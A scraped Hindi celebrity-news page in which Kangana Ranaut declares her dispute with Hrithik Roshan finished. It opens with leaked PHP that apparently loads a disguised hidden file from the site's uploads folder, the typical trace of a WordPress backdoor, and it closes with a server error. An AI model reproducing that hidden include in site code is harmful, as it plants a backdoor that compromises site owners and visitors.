add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); रितिक का किस्सा अब पूरी तरह से समाप्त हो चुका है – SOCH INDIA
Menu

मनोरंजन
रितिक का किस्सा अब पूरी तरह से समाप्त हो चुका है

nobanner

हिंदी सिनेमा में अपनी अलग पहचान बना चुकीं अभिनेत्री कंगना रनौत का कहना है कि उनके और अभिनेता रितिक रोशन के बीच कथित प्रेम संबंधों का मशहूर मसला अब बीते दिनों की बात है और वह किस्सा अब पूरी तरह समाप्त हो चुका है.

पिछले साल दोनों कलाकारों के बीच यह विवाद उस समय शुरू हुआ था जब कंगना ने एक इंटरव्यू में रितिक को ‘सिली एक्स’ कहा था. मामला तब और गरमा गया था जब दोनों ने एक दूसरे को कानूनी नोटिस भेज दिए थे.

रितिक ने उनसे (कंगना) सार्वजनिक माफी की मांग की थी और किसी भी तरह के संबंधों की बात का खंडन किया था. इस पूरे विवाद के दौरान फिल्म जगत के कई लोगों ने कंगना को कुछ भी सार्वजनिक करने से बचने की सलाह दी थी.

बंद दरवाजे के पीछे मामला निपटाने के सवाल पर कंगना ने कहा, ‘‘मुझे कई बड़े लोगों के घर बुलाया गया. मुझे कहा गया कि अगर मैंने अपना मुंह खोला तो मेरा करियर बर्बाद कर दिया जाएगा. लेकिन उन सब बातों का कोई मतलब नहीं है, क्योंकि मेरे लिए वह किस्सा खत्म हो चुका है. वह पूरी तरह से समाप्त हो चुका है और उसकी अब कोई प्रासंगिकता नहीं है.’’

उन्होंने कहा, ‘‘मेरा समय मुश्किल भरा था लेकिन मैं उससे डरी नहीं क्योंकि मुझे पता है कि मैंने कुछ गलत नहीं किया.’’ ऐसी खबरें थीं कि रितिक और कंगना के बीच प्रेमसंबंध ‘क्रिश 3’ की शूटिंग के दौरान शुरू हुए थे.

Share this: 503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.